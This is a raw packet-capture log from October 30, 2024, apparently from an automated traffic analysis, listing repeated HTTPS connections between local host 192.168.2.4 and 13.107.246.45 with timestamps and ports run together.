Oct 30, 2024 03:46:34.557476044 CET4434976413.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.564476967 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.564759016 CET49763443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.564791918 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.565105915 CET49763443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.565115929 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.567420959 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.567652941 CET49765443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.567678928 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.567965984 CET49765443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.567975044 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.633639097 CET4434976113.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.633717060 CET4434976113.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.633781910 CET49761443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.634011984 CET49761443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.634020090 CET4434976113.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.634032011 CET49761443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.634037971 CET4434976113.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.637087107 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.637109995 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.637212038 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.637377024 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.637391090 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.683559895 CET4434976213.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.683657885 CET4434976213.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.683769941 CET49762443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.683886051 CET49762443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.683921099 CET4434976213.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.683968067 CET49762443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.683985949 CET4434976213.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.686530113 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.686563015 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.686654091 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.686808109 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.686825991 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.687397003 CET4434976413.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.687483072 CET4434976413.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.687535048 CET49764443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.687581062 CET49764443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.687589884 CET4434976413.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.687603951 CET49764443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.687608004 CET4434976413.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.689519882 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.689549923 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.689758062 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.689758062 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.689785957 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.694617033 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.694715023 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.694766998 CET49763443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.694813013 CET49763443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.694833994 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.694858074 CET49763443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.694869041 CET4434976313.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.696566105 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.696589947 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.696656942 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.696768045 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.696779966 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.699958086 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.700165987 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.700242996 CET49765443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.700289965 CET49765443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.700314045 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.700341940 CET49765443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.700356007 CET4434976513.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.702584982 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.702604055 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:34.702752113 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.702888012 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:34.702902079 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.365983963 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.367688894 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.367708921 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.368184090 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.368189096 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.421497107 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.424112082 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.424158096 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.424531937 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.424546003 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.428204060 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.428638935 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.428652048 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.429018021 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.429023981 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.433155060 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.435975075 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.435983896 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.436351061 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.436355114 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.436811924 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.437144041 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.437155962 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.437468052 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.437470913 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.498275995 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.498655081 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.498739004 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.498888016 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.498898983 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.498907089 CET49766443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.498913050 CET4434976613.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.504899979 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.504923105 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.505074024 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.505261898 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.505275011 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.549777985 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.549948931 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.550066948 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.550120115 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.550120115 CET49767443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.550163984 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.550204039 CET4434976713.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.552639961 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.552676916 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.552834988 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.552862883 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.552867889 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.558372974 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.558543921 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.558608055 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.558624983 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.558633089 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.558641911 CET49769443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.558646917 CET4434976913.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.560530901 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.560549974 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.560612917 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.560720921 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.560731888 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.563977003 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.564050913 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.564153910 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.564228058 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.564228058 CET49768443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.564241886 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.564250946 CET4434976813.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.565622091 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.565841913 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.565931082 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566039085 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566059113 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.566076994 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566083908 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.566092968 CET49770443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566097021 CET4434977013.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.566117048 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566265106 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.566279888 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.567930937 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.567939997 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:35.568013906 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.568130016 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:35.568142891 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.249962091 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.250469923 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.250494003 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.251113892 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.251120090 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.292637110 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.293096066 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.293122053 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.293653965 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.293668985 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.294998884 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.295341015 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.295373917 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.295805931 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.295819044 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.307423115 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.307828903 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.307842016 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.308396101 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.308401108 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.312884092 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.313210011 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.313218117 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.313674927 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.313679934 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.382468939 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.382541895 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.382608891 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.382786036 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.382800102 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.382808924 CET49771443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.382813931 CET4434977113.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.385720015 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.385735989 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.385817051 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.385983944 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.385996103 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.422574997 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.423062086 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.423140049 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.423202038 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.423202038 CET49772443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.423228025 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.423238039 CET4434977213.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.424834013 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.424902916 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.424952984 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.425091028 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.425103903 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.425111055 CET49774443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.425116062 CET4434977413.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.427020073 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.427052975 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.427167892 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.427278996 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.427285910 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.428242922 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.428253889 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.428395987 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.428484917 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.428491116 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.446444035 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.446762085 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.446892023 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.446979046 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.446990967 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.447000980 CET49773443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.447006941 CET4434977313.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.448934078 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.448944092 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.449014902 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.449131012 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.449136019 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.461000919 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.461158037 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.461244106 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.461443901 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.461447954 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.461467028 CET49775443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.461471081 CET4434977513.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.463380098 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.463393927 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:36.463481903 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.463619947 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:36.463632107 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.114824057 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.116255999 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.116266966 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.116846085 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.116849899 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.171785116 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.176260948 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.176279068 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.176611900 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.176615953 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.184129000 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.188199043 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.188208103 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.188512087 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.188517094 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.193094969 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.195979118 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.195986986 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.196396112 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.196400881 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.202433109 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.204102993 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.204113007 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.204502106 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.204508066 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.244272947 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.244415045 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.244484901 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.244692087 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.244697094 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.244708061 CET49776443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.244712114 CET4434977613.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.247292042 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.247339964 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.247410059 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.247549057 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.247565031 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.303055048 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.303608894 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.303663969 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.303730965 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.303744078 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.303756952 CET49777443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.303762913 CET4434977713.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.306248903 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.306267977 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.307048082 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.307179928 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.307194948 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.320064068 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.320229053 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.320283890 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.320314884 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.320327997 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.320338011 CET49779443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.320343018 CET4434977913.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.322534084 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.322552919 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.322613001 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.322740078 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.322751999 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.338042974 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.338270903 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.338325024 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.338372946 CET49778443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.338376999 CET4434977813.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.341109037 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.341130018 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.341394901 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.341573954 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.341588974 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.367511034 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.367645025 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.367697954 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.367768049 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.367774010 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.367783070 CET49780443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.367786884 CET4434978013.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.370085001 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.370134115 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:37.370225906 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.370357037 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:37.370398045 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.007659912 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.008130074 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.008143902 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.008614063 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.008618116 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.042397976 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.042818069 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.042834997 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.043271065 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.043281078 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.052882910 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.053231955 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.053245068 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.053658962 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.053663969 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.074687004 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.075025082 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.075047016 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.075422049 CET49784443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.075428009 CET4434978413.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.108244896 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.108606100 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.108643055 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.109008074 CET49785443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.109023094 CET4434978513.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.139841080 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.139918089 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.139971972 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.140111923 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.140126944 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.140135050 CET49781443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.140141010 CET4434978113.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.142725945 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.142748117 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.142808914 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.142966986 CET49786443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.142982006 CET4434978613.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.179418087 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.179882050 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.179959059 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.180000067 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.180021048 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.180035114 CET49782443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.180042982 CET4434978213.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.182816982 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.182889938 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.182969093 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.183043957 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.183134079 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.183146000 CET49787443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.183176994 CET4434978713.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.183181047 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.183377981 CET49783443192.168.2.413.107.246.45
Oct 30, 2024 03:46:38.183388948 CET4434978313.107.246.45192.168.2.4
Oct 30, 2024 03:46:38.183397055 CET49783443192.168.2.413.107.246.45
